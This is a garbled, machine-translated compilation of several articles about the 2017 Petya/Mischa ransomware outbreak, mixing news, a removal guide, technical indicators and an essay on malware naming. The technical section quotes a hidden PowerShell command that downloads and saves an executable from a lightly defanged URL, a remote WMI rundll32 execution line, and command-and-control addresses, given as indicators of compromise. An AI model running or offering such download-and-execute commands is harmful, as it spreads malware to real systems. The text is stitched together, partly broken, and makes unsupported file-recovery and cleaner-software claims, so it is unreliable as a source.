The petya virus has returned with misha. Similar to Petya, friend Misha: what is known about the new ransomware virus. Shadow copies of volumes

Illustration copyright PA Image caption According to experts, fighting the new ransomware is more difficult than WannaCry

On June 27, ransomware locked computers and encrypted files at dozens of companies around the world.

It is reported that Ukrainian companies suffered the most - the virus infected the computers of large companies, government agencies and infrastructure facilities.

The virus demands $300 in Bitcoin from victims to decrypt files.

The BBC Russian service answers the main questions about the new threat.

Who was hurt?

The spread of the virus began in Ukraine. The Boryspil airport, some regional divisions of Ukrenergo, chain stores, banks, media and telecommunications companies were affected. Computers in the Ukrainian government also went down.

Following this, it was the turn of companies in Russia: Rosneft, Bashneft, Mondelеz International, Mars, Nivea and others also became victims of the virus.

How does the virus work?

Experts have not yet reached a consensus on the origin of the new virus. Group-IB and Positive Technologies companies see it as a variety Petya virus 2016.

"This is extortion software uses both hacker methods and utilities, and standard system administration utilities, comments the head of the threat response department information security Positive Technologies Elmar Nabigaev. - All this guarantees a high speed of spread within the network and the massiveness of the epidemic as a whole (if at least one personal computer). The result is complete computer inoperability and data encryption."

The Romanian company Bitdefender sees more in common with the GoldenEye virus, in which Petya is combined with another malware called Misha. The advantage of the latter is that it does not require administrator rights from the future victim to encrypt files, but extracts them independently.

Brian Cambell from Fujitsu and a number of other experts believe that new virus uses a modified EternalBlue program stolen from the US National Security Agency.

After the publication of this program by hackers The Shadow Brokers in April 2017, the WannaCry ransomware virus created on its basis spread all over the world.

Using Windows vulnerabilities, this program allows the virus to spread to computers throughout corporate network. The original Petya was sent by email under the guise of a resume and could only infect the computer where the resume was opened.

Kaspersky Lab told Interfax that the ransomware virus does not belong to previously known families of malicious software.

“Kaspersky Lab software products detect this malware as UDS:DangeroundObject.Multi.Generic,” noted Vyacheslav Zakorzhevsky, head of the anti-virus research department at Kaspersky Lab.

In general, if you call the new virus by its Russian name, you need to keep in mind that in appearance it looks more like Frankenstein’s monster, since it is assembled from several malicious programs. It is known for certain that the virus was born on June 18, 2017.

Image caption The virus demands $300 to decrypt files and unlock your computer.

Cooler than WannaCry?

It took WannaCry just a few days in May 2017 to become the largest cyberattack of its kind in history. Will the new ransomware virus surpass its recent predecessor?

In less than a day, the attackers received 2.1 bitcoins from their victims - about 5 thousand dollars. WannaCry collected 7 bitcoins during the same period.

At the same time, according to Elmar Nabigaev from Positive Technologies, it is more difficult to fight the new ransomware.

“In addition to exploiting [the Windows vulnerability], this threat is also spread through operating system accounts stolen using special hacking tools,” the expert noted.

How to fight the virus?

As a preventative measure, experts advise installing updates for operating systems on time and checking files received by email.

Advanced administrators are advised to temporarily disable the Server Message Block (SMB) network transfer protocol.

If your computers are infected, under no circumstances should you pay the attackers. There is no guarantee that once they receive payment, they will decrypt the files rather than demand more.

All that remains is to wait for the decryption program: in the case of WannaCry, it took Adrien Guinier, a specialist from the French company Quarkslab, a week to create it.

The first AIDS ransomware (PC Cyborg) was written by biologist Joseph Popp in 1989. She hid directories and encrypted files, demanding payment of $189 for" license Renewal" to an account in Panama. Popp distributed his brainchild via floppy disks. regular mail, having completed a total of about 20 thousandyachshipments. Popp was detained while trying to cash a check, but avoided trial - in 1991 he was declared insane.

A few months ago, we and other IT Security specialists discovered a new malware - Petya (Win32.Trojan-Ransom.Petya.A). In the classical sense, it was not an encryptor; the virus simply blocked access to certain types of files and demanded a ransom. The virus modified the boot record on the hard drive, forcibly rebooted the PC and showed a message that “the data is encrypted - waste your money for decryption.” In general, the standard scheme of encryption viruses, except that the files were NOT actually encrypted. Most popular antiviruses began identifying and removing Win32.Trojan-Ransom.Petya.A a few weeks after its appearance. In addition, instructions for manual removal appeared. Why do we think that Petya is not a classic ransomware? This virus makes changes to the Master Boot Record and prevents the OS from loading, and also encrypts the Master File Table. It does not encrypt the files themselves.

However, a more sophisticated virus appeared a few weeks ago Mischa, apparently written by the same scammers. This virus ENCRYPTS files and requires you to pay $500 - $875 for decryption (in different versions 1.5 – 1.8 bitcoins). Instructions for “decryption” and payment for it are stored in the files YOUR_FILES_ARE_ENCRYPTED.HTML and YOUR_FILES_ARE_ENCRYPTED.TXT.

Mischa virus – contents of YOUR_FILES_ARE_ENCRYPTED.HTML file

Now, in fact, hackers infect users’ computers with two malwares: Petya and Mischa. The first one needs administrator rights on the system. That is, if a user refuses to give Petya admin rights or manually deletes this malware, Mischa gets involved. This virus does not require administrator rights, it is a classic encryptor and actually encrypts files using the strong AES algorithm and without making any changes to the Master Boot Record and the file table on the victim’s hard drive.

The Mischa malware encrypts not only standard file types (videos, pictures, presentations, documents), but also .exe files. The virus does not affect only the directories \Windows, \$Recycle.Bin, \Microsoft, \ Mozilla Firefox,\Opera,\ Internet Explorer, \Temp, \Local, \LocalLow and \Chrome.

Infection occurs mainly through email, where a letter arrives with an attached file - a virus installer. It can be encrypted under a letter from the Tax Service, from your accountant, as attached receipts and receipts for purchases, etc. Pay attention to the file extensions in such letters - if it is an executable file (.exe), then with a high probability it may be a container with the Petya\Mischa virus. And if the modification of the malware is recent, your antivirus may not respond.

Update 06/30/2017: June 27, a modified version of the Petya virus (Petya.A) massively attacked users in Ukraine. The effect of this attack was enormous and the economic damage has not yet been calculated. In one day, the work of dozens of banks, retail chains, government agencies and enterprises of various forms of ownership was paralyzed. The virus spread primarily through a vulnerability in Ukrainian system submissions financial statements MeDoc with the latest automatic update of this software. In addition, the virus has affected countries such as Russia, Spain, Great Britain, France, and Lithuania.

Remove Petya and Mischa virus using an automatic cleaner

Exclusively effective method working with malware in general and ransomware in particular. The use of a proven protective complex guarantees thorough detection of any viral components, their complete removal with one click. Please note that we are talking about two different processes: uninstalling the infection and restoring files on your PC. However, the threat certainly needs to be removed, since there is information about the introduction of other computer Trojans using it.

. After starting the software, click the button Start Computer Scan(Start scanning).
The installed software will provide a report on the threats detected during scanning. To remove all detected threats, select the option Fix Threats(Eliminate threats). The malware in question will be completely removed.

Restore access to encrypted files

As noted, the Mischa ransomware locks files using a strong encryption algorithm so that encrypted data cannot be restored with a wave of a magic wand - short of paying an unheard-of ransom amount (sometimes reaching up to $1,000). But some methods can really be a lifesaver that will help you recover important data. Below you can familiarize yourself with them.

Program automatic recovery files (decryptor)

A very unusual circumstance is known. This infection erases the original files in unencrypted form. The encryption process for extortion purposes thus targets copies of them. This makes it possible for software such as recovery of erased objects, even if the reliability of their removal is guaranteed. It is highly recommended to resort to the file recovery procedure; its effectiveness is beyond doubt.

Shadow copies volumes

The approach is based on the Windows procedure Reserve copy files, which is repeated at each recovery point. Important condition work this method: The “System Restore” function must be activated before infection. However, any changes to the file made after the restore point will not appear in the restored version of the file.

Backup

This is the best among all non-ransom methods. If the procedure for backing up data to an external server was used before the ransomware attack on your computer, to restore encrypted files you simply need to enter the appropriate interface, select necessary files and start the data recovery mechanism from the backup. Before performing the operation, you must make sure that the ransomware is completely removed.

Check for possible presence of residual components of the Petya and Mischa ransomware

Manual cleaning risks missing individual pieces of ransomware that could escape removal as hidden objects operating system or registry items. To eliminate the risk of partial retention of individual malicious elements, scan your computer using a reliable security software package that specializes in malicious software.

There is a new ransomware virus epidemic on the Internet. The malware practically blocked the work of dozens of large companies, demanding decryption hard drive each workstation just under $400.

The panic generated by the new epidemic created information chaos: first, anti-virus analysts announced the second coming of WannaCry, then the malware was identified as a complex of newly assembled encryption viruses “Petya” and “Misha”. On this moment it is clear that if the virus was based on Petya, it was heavily modified.

The distribution model is partly similar to WannaCry - an exploit for the MS17-010 vulnerability is used, which was enhanced by social engineering using a vulnerability in MS Word. Infection occurs after a user opens an email attachment or downloads a file that exploits the CVE-2017-0199 vulnerability published in April 2017. And distribution to other computers on the network is already ensured by a whole set of techniques:

stealing user passwords or using active sessions to access other network nodes (Mimikatz utility code is used).
through a vulnerability in SMB (CVE-2017-0144, MS17-010) - using the same famous EthernalBlue exploit that was successfully used in WannaCry.

The malware uses stolen Accounts to copy his body into the admin$ balls and launches them using the legal PsExec utility, which serves to remote control computer.

Developer of a famous program Mimikatz, confirmed that its modified code is used to extract passwords.

Code for using the WMI interface to run the installation was also published on the Microsoft blog.

Infection via the SMB vector uses the CVE-2017-0144 vulnerability, similar to the technique used in WannaCry.

But the encryption model has changed significantly compared to WannaCry. The virus, penetrating the computer, infects the MBR (master boot record) of the system and encrypts the first few blocks of the hard drive, including the Master File Table, making the entire HDD users, not just separate files, as ransomware viruses usually do.

It’s definitely not worth paying a ransom to extortionists, and not only for ethical reasons: virus analysts have come to the conclusion that decrypting files after paying a ransom is in principle impossible. This function is simply not included in the malware. In fact, this is not an epidemic of ransomware, but an epidemic of a wiper virus that destroys data.

According to media reports in Russia, the greatest problems were encountered in the Rosneft corporation; the main websites of the corporation and the Bashneft website were disabled for a long time.

Massive infections have been recorded in France, Spain, Russia, and CIS countries. In Ukraine, dozens of government and commercial organizations have been affected by the virus.

Who needs it?

Since the recovery mechanism was not included in the code, there are three possible options for motivating attackers. Either they wanted to disguise the targeted destruction of someone’s specific data as a mass epidemic, or they wanted to make money without initially intending to restore anything. The least likely option is cyber vandalism. A virus is a serious product, and it would be wiser to spend the effort to create it on something that brings in money. Vandals were common in the 1990s, when it was fashionable to break systems for fame, but they are now extremely rare.

As a result, the main beneficiaries of the epidemics of the last 2 months were, apparently, the group The Shadow Brokers, which distributed the EthernalBlue exploit. The extortionists themselves collected relatively small amounts of money, several orders of magnitude less than the amount of damage caused by the epidemic. The epidemics have become excellent advertising for The Shadow Brokers, who claim that they are ready to sell information about other exploits from the NSA archive. After all, EthernalBlue is just one exploit out of dozens stolen from the Secret Service in August 2016.

Attack Mechanism

An attacker can send files or links to them (at the initial stage of the epidemic these were the files Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc), through which a workstation running Windows is infected. For example, when opening the file Order-[any date].doc, the server 84.200.16.242 is contacted on port 80 and xls is downloaded:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [process id], Additional Context: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[random number].exe") ;)

The malware then tries to connect to servers 111.90.139.247:80 and COFFEINOFFICE.XYZ:80, which are possibly command and control servers.

Indicators of compromise are the presence of files:

C:\Windows\perfc.dat
C:\myguy.xls.hta

After being assigned to the host, other Windows machines on the network and spread through the vulnerabilities described in MS17-010 (the same ones used by WannaCry) on ports tcp:135, tcp:139, tcp:445, tcp:1024-1035.

Distribution can also occur by executing the command:

Remote WMI, “process call create "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"

The infection spread diagram is taken from blog.kryptoslogic.com

How to avoid infection?

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc

3. Install patches

4. Configure IPS to block exploits for MS17-010

5. To protect hosts that have not yet been infected, you can create a file c:\windows\perfc without an extension. Such nodes are not infected.

A brief excursion into the history of malware naming.

To bookmarks

Petya.A virus logo

On June 27, at least 80 Russian and Ukrainian companies were attacked by the Petya.A virus. The program blocked information on the computers of departments and enterprises and, like the well-known ransomware virus, demanded bitcoins from users.

Malicious programs are usually named by employees of antivirus companies. The exceptions are those encryptors, ransomware, destroyers and identity thieves, which, in addition to computer infections, cause media epidemics - increased hype in the media and active discussion on the network.

However, the Petya.A virus is a representative of a new generation. The name by which he introduces himself is part of the developers’ marketing strategy aimed at increasing his recognition and popularity on the darknet market.

Subcultural phenomenon

In those days when there were few computers and not all of them were connected to each other, self-propagating programs (not yet viruses) already existed. One of the first of these was , which jokingly greeted the user and offered to catch him and delete him. Next up was Cookie Monster, who demanded to “give him a cookie” by entering the word “cookie.”

Early malware also had a sense of humor, although it wasn't always in their names. Thus, Richard Scrant, designed for the Apple-2 computer, read a poem to the victim once every 50 computer startups, and the names of the viruses, often hidden in the code and not displayed, referred to jokes and subcultural words common among geeks of that time. They could be associated with metal band names, popular literature, and tabletop role-playing games.

At the end of the 20th century, the creators of viruses did not hide much - moreover, often, when a program got out of control, they tried to take part in eliminating the harm caused to it. This was the case with the Pakistani and destructive one, created by the future co-founder of the Y-Combinator business incubator.

One of the Russian viruses mentioned by Evgeniy Kaspersky in his 1992 book “ Computer viruses in MS-DOS." The Condom-1581 program from time to time showed the victim a program dedicated to the problems of clogging the world's oceans with human waste products.

Geography and calendar

In 1987, the Jerusalem virus, also known as the Israeli Virus, was named after the place where it was first discovered, and its alternative name Black Friday was due to the fact that it would activate and delete executable files if the 13th of the month fell on a Friday.

The Michelangelo virus, which caused panic in the media in the spring of 1992, was also named according to the calendar principle. Then John McAfee, later famous for creating one of the most intrusive antiviruses, during a Sydney cybersecurity conference, told journalists and the public: “If you boot an infected system on March 6, all the data on the hard drive will be corrupted.” What does Michelangelo have to do with this? March 6 was the Italian artist’s birthday. However, the horrors that McAfee predicted ended up being wildly exaggerated.

Functionality

The capabilities of the virus and its specificity often serve as the basis for the name. In 1990, one of the first polymorphic viruses was named Chameleon, and its wide possibilities hide its presence (and therefore belong to the category of stealth viruses), was named Frodo, hinting at the hero of “The Lord of the Rings” and the Ring hiding from the eyes of others. And, for example, the OneHalf virus of 1994 got its name due to the fact that it showed aggression only by infecting half of the disk of the attacked device.

Service titles

Most viruses have long been named in laboratories, where they are analyzed into parts by analysts.

Usually these are boring serial names and general “family” names that describe the category of the virus, what systems it attacks and what it does with them (like Win32.HLLP.DeTroie). However, sometimes, when hints left by the developers are revealed in the program code, viruses gain a little personality. This is how, for example, the MyDoom and KooKoo viruses appeared.

However, this rule does not always work - for example, the Stuxnet virus, which stopped uranium enrichment centrifuges in Iran, was not called Myrtus, although this word (“myrtle”) in the code was almost a direct hint at the participation of Israeli intelligence services in its development. In this case, the name that had already become known to the general public, assigned to the virus in the first stages of its discovery, won.

Tasks

It often happens that viruses that require a lot of attention and effort to study receive beautiful names from antivirus companies that are easier to say and write down - this happened with Red October, diplomatic correspondence and data that could affect international relations, as well as with IceFog , large-scale industrial espionage.

File extension

Another popular way names - according to the extension that the virus assigns to infected files. Thus, one of the “military” viruses, Duqu, was named so not because of Count Dooku from Star Wars, but because of the ~DQ prefix, which marked the files it created.

This is how the sensational one got its name this spring. WannaCry virus, which marks the data it encrypts with the .wncry extension.

Earlier name Wanna virus Decrypt0r, it didn’t catch on - it sounded worse and had different spellings. Not everyone bothered to put "0" as an "o".

“You have become a victim of the Petya ransomware virus”

This is exactly what the most discussed today seems to be malware, completing encryption of files on the attacked computer. The Petya A. virus not only has a recognizable name, but also a logo in the form of a pirate skull and crossbones, and a whole marketing promotion. Spotted together with its brother “Misha”, the virus attracted the attention of analysts precisely because of this.

From a subcultural phenomenon, having gone through a period when this kind of “hacking” required quite serious technical knowledge, viruses turned into a weapon of a cyber-gop-stop. Now they have to play by market rules - and whoever gets more attention brings big profits to their developers.